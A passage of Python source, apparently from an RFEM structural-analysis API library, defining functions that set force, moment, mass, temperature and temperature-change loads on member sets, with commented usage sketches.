clientObject.magnitude_1 = load_parameter[2]
clientObject.magnitude_2 = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
else:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_CONCENTRATED_2. Kindly check list inputs completeness and correctness.")
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_VARYING":
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
elif load_distribution.name == "LOAD_DISTRIBUTION_TRAPEZOIDAL":
if len(load_parameter) == 6:
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
clientObject.magnitude_1 = load_parameter[2]
clientObject.magnitude_2 = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
else:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TRAPEZOIDAL. Kindly check list inputs completeness and correctness.")
elif load_distribution.name == "LOAD_DISTRIBUTION_TAPERED":
if len(load_parameter)==6:
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
clientObject.magnitude_1 = load_parameter[2]
clientObject.magnitude_2 = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
else:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TAPERED. Kindly check list inputs completeness and correctness.")
elif load_distribution.name == "LOAD_DISTRIBUTION_PARABOLIC":
if len(load_parameter)==3:
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.magnitude_3 = load_parameter[2]
else:
raise Exception("WARNING: Load parameter array length should be 3 for LOAD_DISTRIBUTION_PARABOLIC. Kindly check list inputs completeness and correctness.")
elif load_distribution.name == "LOAD_DISTRIBUTION_VARYING":
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
elif load_distribution.name == "LOAD_DISTRIBUTION_VARYING_IN_Z":
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
# Member Load Direction
clientObject.load_direction = load_direction.name
# Force Eccentricity
clientObject.has_force_eccentricity = force_eccentricity
if force_eccentricity == True:
# Ensure that all eccentricity keys are supplied in params.
if all(key in params for key in (
'eccentricity_horizontal_alignment', 'eccentricity_vertical_alignment', 'eccentricity_section_middle',
'is_eccentricity_at_end_different_from_start', 'eccentricity_y_at_end', 'eccentricity_y_at_start',
'eccentricity_z_at_end', 'eccentricity_z_at_start')):
pass
else:
raise Exception("WARNING: Params does not contain all the necessary parameters. Kindly check dictionary")
params_ecc = {'eccentricity_horizontal_alignment': MemberSetLoadEccentricityHorizontalAlignment.ALIGN_NONE,
'eccentricity_vertical_alignment': MemberSetLoadEccentricityVerticalAlignment.ALIGN_NONE,
'eccentricity_section_middle': MemberSetLoadEccentricitySectionMiddle.LOAD_ECCENTRICITY_SECTION_MIDDLE_CENTER_OF_GRAVITY,
'is_eccentricity_at_end_different_from_start': False,
'eccentricity_y_at_end': 0.0,
'eccentricity_y_at_start': 0.0,
'eccentricity_z_at_end': 0.0,
'eccentricity_z_at_start': 0.0}
params_ecc.update(params)
if params_ecc['is_eccentricity_at_end_different_from_start'] == False:
clientObject.eccentricity_horizontal_alignment= params_ecc['eccentricity_horizontal_alignment'].name
clientObject.eccentricity_vertical_alignment= params_ecc['eccentricity_vertical_alignment'].name
clientObject.eccentricity_section_middle = params_ecc['eccentricity_section_middle'].name
clientObject.eccentricity_y_at_end= params_ecc['eccentricity_y_at_start']
clientObject.eccentricity_y_at_start= params_ecc['eccentricity_y_at_start']
clientObject.eccentricity_z_at_end= params_ecc['eccentricity_z_at_start']
clientObject.eccentricity_z_at_start= params_ecc['eccentricity_z_at_start']
elif params_ecc['is_eccentricity_at_end_different_from_start'] == True:
clientObject.eccentricity_horizontal_alignment= params_ecc['eccentricity_horizontal_alignment']
clientObject.eccentricity_vertical_alignment= params_ecc['eccentricity_vertical_alignment']
clientObject.eccentricity_section_middle = params_ecc['eccentricity_section_middle']
clientObject.eccentricity_y_at_end= params_ecc['eccentricity_y_at_end']
clientObject.eccentricity_y_at_start= params_ecc['eccentricity_y_at_start']
clientObject.eccentricity_z_at_end= params_ecc['eccentricity_z_at_end']
clientObject.eccentricity_z_at_start= params_ecc['eccentricity_z_at_start']
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
if any(key in params for key in (
'eccentricity_horizontal_alignment', 'eccentricity_vertical_alignment', 'eccentricity_section_middle',
'is_eccentricity_at_end_different_from_start', 'eccentricity_y_at_end', 'eccentricity_y_at_start',
'eccentricity_z_at_end', 'eccentricity_z_at_start')):
pass
else:
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
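# Usage sketch (illustrative only): Force() with a trapezoidal distribution. The six-element
# load_parameter list follows the docstring above:
# [relative_distance_a, relative_distance_b, magnitude_1, magnitude_2, distance_a, distance_b].
# Because 'self' is not referenced inside Force(), the class itself is passed in its place in
# this sketch; that calling style, as well as the existence of load case 1 and member set 1,
# are assumptions.
#
#   from RFEM.enums import MemberSetLoadDistribution, MemberSetLoadDirection
#   from RFEM.Loads.membersetload import MemberSetLoad
#
#   MemberSetLoad.Force(MemberSetLoad, no=2, load_case_no=1, member_sets='1',
#                       load_distribution=MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL,
#                       load_direction=MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_Z,
#                       load_parameter=[False, False, 1000.0, 2000.0, 0.5, 1.0])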
def Moment(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_distribution= MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_direction= MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_Z,
load_parameter = [],
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_distribution (enum): Load Distribution Enumeration
load_direction (enum): Load Direction Enumeration
load_parameter (list): Load Parameters
comment (str, optional): Comments
params (dict, optional): Parameters
for LOAD_DISTRIBUTION_UNIFORM:
load_parameter = [magnitude]
for LOAD_DISTRIBUTION_CONCENTRATED_1:
load_parameter = [relative_distance = False, magnitude, distance_a]
for LOAD_DISTRIBUTION_CONCENTRATED_N:
load_parameter = [relative_distance_a = False, relative_distance_b = False, magnitude, count_n, distance_a, distance_b]
for LOAD_DISTRIBUTION_CONCENTRATED_2x2:
load_parameter = [relative_distance_a = False, relative_distance_b = False, relative_distance_c = False, magnitude, distance_a, distance_b, distance_c]
for LOAD_DISTRIBUTION_CONCENTRATED_2:
load_parameter = [relative_distance_a = False, relative_distance_b = False, magnitude_1, magnitude_2, distance_a, distance_b]
for LOAD_DISTRIBUTION_CONCENTRATED_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
for LOAD_DISTRIBUTION_TRAPEZOIDAL:
load_parameter = [relative_distance_a = False, relative_distance_b = False,magnitude_1, magnitude_2, distance_a, distance_b]
for LOAD_DISTRIBUTION_TAPERED:
load_parameter = [relative_distance_a = False, relative_distance_b = False,magnitude_1, magnitude_2, distance_a, distance_b]
for LOAD_DISTRIBUTION_PARABOLIC:
load_parameter = [magnitude_1, magnitude_2, magnitude_3]
for LOAD_DISTRIBUTION_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Member Sets No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_MOMENT
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution= load_distribution.name
#Load Magnitude and Parameters
if load_distribution.name == "LOAD_DISTRIBUTION_UNIFORM":
try:
len(load_parameter)==1
except:
raise Exception("WARNING: Load parameter array length should be 1 for LOAD_DISTRIBUTION_UNIFORM. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_1":
try:
len(load_parameter)==3
except:
raise Exception("WARNING: Load parameter array length should be 3 for LOAD_DISTRIBUTION_CONCENTRATED_1. Kindly check list inputs completeness and correctness.")
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
if load_parameter[0] == False:
clientObject.magnitude = load_parameter[1]
clientObject.distance_a_absolute = load_parameter[2]
else:
clientObject.magnitude = load_parameter[1]
clientObject.distance_a_relative = load_parameter[2]
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_N":
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_CONCENTRATED_N. Kindly check list inputs completeness and correctness.")
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
clientObject.magnitude = load_parameter[2]
clientObject.count_n = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_2x2":
try:
len(load_parameter)==7
except:
raise Exception("WARNING: Load parameter array length should be 7 for LOAD_DISTRIBUTION_CONCENTRATED_2x2. Kindly check list inputs completeness and correctness.")
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
clientObject.distance_c_is_defined_as_relative = load_parameter[2]
clientObject.magnitude = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
if load_parameter[2] == False:
clientObject.distance_c_absolute = load_parameter[6]
else:
clientObject.distance_c_relative = load_parameter[6]
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_2":
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_CONCENTRATED_2. Kindly check list inputs completeness and correctness.")
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
clientObject.magnitude_1 = load_parameter[2]
clientObject.magnitude_2 = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_VARYING":
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
elif load_distribution.name == "LOAD_DISTRIBUTION_TRAPEZOIDAL":
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TRAPEZOIDAL. Kindly check list inputs completeness and correctness.")
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
clientObject.magnitude_1 = load_parameter[2]
clientObject.magnitude_2 = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
elif load_distribution.name == "LOAD_DISTRIBUTION_TAPERED":
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TAPERED. Kindly check list inputs completeness and correctness.")
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
clientObject.magnitude_1 = load_parameter[2]
clientObject.magnitude_2 = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
elif load_distribution.name == "LOAD_DISTRIBUTION_PARABOLIC":
try:
len(load_parameter)==3
except:
raise Exception("WARNING: Load parameter array length should be 3 for LOAD_DISTRIBUTION_PARABOLIC. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.magnitude_3 = load_parameter[2]
elif load_distribution.name == "LOAD_DISTRIBUTION_VARYING":
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
# Member Load Direction
clientObject.load_direction = load_direction.name
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
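# Usage sketch (illustrative only): Moment() with a single concentrated moment
# (LOAD_DISTRIBUTION_CONCENTRATED_1). Per the docstring above, load_parameter is
# [relative_distance, magnitude, distance_a]; with relative_distance=False the distance is
# taken as absolute. The calling style and the existence of load case 1 and member set 1 are
# assumptions of this sketch.
#
#   MemberSetLoad.Moment(MemberSetLoad, no=3, load_case_no=1, member_sets='1',
#                        load_distribution=MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_1,
#                        load_parameter=[False, 500.0, 1.25])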
def Mass(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
individual_mass_components: bool=False,
mass_components = [],
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
individual_mass_components (bool): Individual Mass Components Option
mass_components (list): Mass Components
comment (str, optional): Comment
params (dict, optional): Parameters
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Member Sets No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
clientObject.load_type = MemberSetLoadType.E_TYPE_MASS.name
# Member Load Distribution
clientObject.load_distribution= MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM.name
# Individual Mass Components
if type(individual_mass_components) == bool:
pass
else:
raise Exception("WARNING: Type of individual mass components should be bool. Kindly check inputs correctness.")
clientObject.individual_mass_components = individual_mass_components
# Mass magnitude
if individual_mass_components == False:
clientObject.mass_global = mass_components[0]
else:
clientObject.mass_x = mass_components[0]
clientObject.mass_y = mass_components[1]
clientObject.mass_z = mass_components[2]
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
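# Usage sketch (illustrative only): Mass(). With individual_mass_components=True the three
# list entries are read as mass_x, mass_y and mass_z; with False only the first entry is used
# as a global mass. SI units and the calling style are assumptions of this sketch.
#
#   MemberSetLoad.Mass(MemberSetLoad, no=4, load_case_no=1, member_sets='1',
#                      individual_mass_components=True,
#                      mass_components=[100.0, 100.0, 50.0])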
def Temperature(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_direction = MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_Z,
load_parameter = [],
load_over_total_length: bool= False,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_distribution (enum): Load Distribution Enumeration
load_direction (enum): Load Direction Enumeration
load_parameter (list): Load Parameters
load_over_total_length (bool): Load Over Total Length Option
comment (str, optional): Comment
params (dict, optional): Parameters
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
load_parameter = [tb, tt]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL:
for load_over_total_length: bool= False:
load_parameter = [tb1, tb2, tt1, tt2, distance_a_relative = False, distance_b_relative = False, a_distance, b_distance]
for load_over_total_length: bool= True:
load_parameter = [tb1, tb2, tt1, tt2]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
load_parameter = [tb1, tb2, tt1, tt2, distance_a_relative = False, distance_b_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
load_parameter = [tb1, tb2, tb3, tt1, tt2, tt3]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_VARYING:
load_parameter = [[distance, delta_distance, magnitude_t_t, magnitude_t_b], ...]
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Member Sets No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_TEMPERATURE
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = load_distribution.name
# Member Load Direction
clientObject.load_direction = load_direction.name
#Load Magnitude
if load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
try:
len(load_parameter)==2
except:
raise Exception("WARNING: Load parameter array length should be 2 for LOAD_DISTRIBUTION_UNIFORM. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_t_b = load_parameter[0]
clientObject.magnitude_t_t = load_parameter[1]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL:
try:
len(load_parameter)==8
except:
raise Exception("WARNING: Load parameter array length should be 8 for LOAD_DISTRIBUTION_TRAPEZOIDAL. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_t_b_1 = load_parameter[0]
clientObject.magnitude_t_b_2 = load_parameter[1]
clientObject.magnitude_t_t_1 = load_parameter[2]
clientObject.magnitude_t_t_2 = load_parameter[3]
if type(load_over_total_length) == bool:
pass
else:
raise Exception("WARNING: Type of load over total length should be bool. Kindly check inputs correctness.")
if load_over_total_length == False:
if load_parameter[4] == True:
clientObject.distance_a_is_defined_as_relative = True
clientObject.distance_a_relative = load_parameter[6]
else:
clientObject.distance_a_is_defined_as_relative = False
clientObject.distance_a_absolute = load_parameter[6]
if load_parameter[5] == True:
clientObject.distance_b_is_defined_as_relative = True
clientObject.distance_b_relative = load_parameter[7]
else:
clientObject.distance_b_is_defined_as_relative = False
clientObject.distance_b_absolute = load_parameter[7]
else:
clientObject.load_is_over_total_length = True
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
try:
len(load_parameter)==8
except:
raise Exception("WARNING: Load parameter array length should be 8 for LOAD_DISTRIBUTION_TAPERED. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_t_b_1 = load_parameter[0]
clientObject.magnitude_t_b_2 = load_parameter[1]
clientObject.magnitude_t_t_1 = load_parameter[2]
clientObject.magnitude_t_t_2 = load_parameter[3]
if type(load_parameter[4]) == bool:
pass
else:
raise Exception("WARNING: Type of the fourth load parameter should be bool. Kindly check inputs correctness.")
if load_parameter[4] == True:
clientObject.distance_a_is_defined_as_relative = True
clientObject.distance_a_relative = load_parameter[6]
else:
clientObject.distance_a_is_defined_as_relative = False
clientObject.distance_a_absolute = load_parameter[6]
if type(load_parameter[5]) == bool:
pass
else:
raise Exception("WARNING: Type of the fifth load parameter should be bool. Kindly check inputs correctness.")
if load_parameter[5] == True:
clientObject.distance_b_is_defined_as_relative = True
clientObject.distance_b_relative = load_parameter[7]
else:
clientObject.distance_b_is_defined_as_relative = False
clientObject.distance_b_absolute = load_parameter[7]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_PARABOLIC. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_t_b_1 = load_parameter[0]
clientObject.magnitude_t_b_2 = load_parameter[1]
clientObject.magnitude_t_b_3 = load_parameter[2]
clientObject.magnitude_t_t_1 = load_parameter[3]
clientObject.magnitude_t_t_2 = load_parameter[4]
clientObject.magnitude_t_t_3 = load_parameter[5]
elif load_distribution.name == "LOAD_DISTRIBUTION_VARYING":
try:
len(load_parameter[0])==4
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = load_parameter[i][2]
mlvlp.magnitude_delta_t = load_parameter[i][3]
mlvlp.magnitude_t_t = load_parameter[i][2]
mlvlp.magnitude_t_b = load_parameter[i][3]
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
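# Usage sketch (illustrative only): Temperature() with a uniform distribution. As implemented
# above, load_parameter[0] is written to magnitude_t_b and load_parameter[1] to magnitude_t_t.
# The numeric values and the calling style are assumptions of this sketch.
#
#   MemberSetLoad.Temperature(MemberSetLoad, no=5, load_case_no=1, member_sets='1',
#                             load_distribution=MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
#                             load_parameter=[80.0, 20.0])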
def TemperatureChange(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_direction = MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_Z,
load_parameter = [],
load_over_total_length: bool= False,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_distribution (enum): Load Distribution Enumeration
load_direction (enum): Load Direction Enumeration
load_parameter (list): Load Parameters
load_over_total_length (bool): Load Over Total Length Option
comment (str, optional): Comment
params (dict, optional): Parameters
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
load_parameter = [delta_t, tc]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL:
for load_over_total_length: bool= False:
load_parameter = [delta_t_1, delta_t_2, t_c_1, t_c_2, distance_a_relative = False, distance_b_relative = False, a_distance, b_distance]
for load_over_total_length: bool= True:
load_parameter = [delta_t_1, delta_t_2, t_c_1, t_c_2]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
load_parameter = [delta_t_1, delta_t_2, t_c_1, t_c_2, distance_a_relative = False, distance_b_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
load_parameter = [delta_t_1, delta_t_2, delta_t_3, t_c_1, t_c_2, t_c_3]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_VARYING:
load_parameter = [[distance, delta_distance, magnitude_t_c, magnitude_delta_t], ...]
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Member Sets No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_TEMPERATURE_CHANGE
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = load_distribution.name
# Member Load Direction
clientObject.load_direction = load_direction.name
#Load Magnitude
if load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
try:
len(load_parameter)==2
except:
raise Exception("WARNING: Load parameter array length should be 2 for LOAD_DISTRIBUTION_UNIFORM. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_delta_t = load_parameter[0]
clientObject.magnitude_t_c = load_parameter[1]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL:
try:
len(load_parameter)==8
except:
raise Exception("WARNING: Load parameter array length should be 8 for LOAD_DISTRIBUTION_TRAPEZOIDAL. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_delta_t_1 = load_parameter[0]
clientObject.magnitude_delta_t_2 = load_parameter[1]
clientObject.magnitude_t_c_1 = load_parameter[2]
clientObject.magnitude_t_c_2 = load_parameter[3]
if type(load_over_total_length) == bool:
pass
else:
raise Exception("WARNING: Type of the load over total length should be bool. Kindly check inputs correctness.")
if load_over_total_length == False:
if load_parameter[4] == True:
clientObject.distance_a_is_defined_as_relative = True
clientObject.distance_a_relative = load_parameter[6]
else:
clientObject.distance_a_is_defined_as_relative = False
clientObject.distance_a_absolute = load_parameter[6]
if load_parameter[5] == True:
clientObject.distance_b_is_defined_as_relative = True
clientObject.distance_b_relative = load_parameter[7]
else:
clientObject.distance_b_is_defined_as_relative = False
clientObject.distance_b_absolute = load_parameter[7]
else:
clientObject.load_is_over_total_length = True
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
try:
len(load_parameter)==8
except:
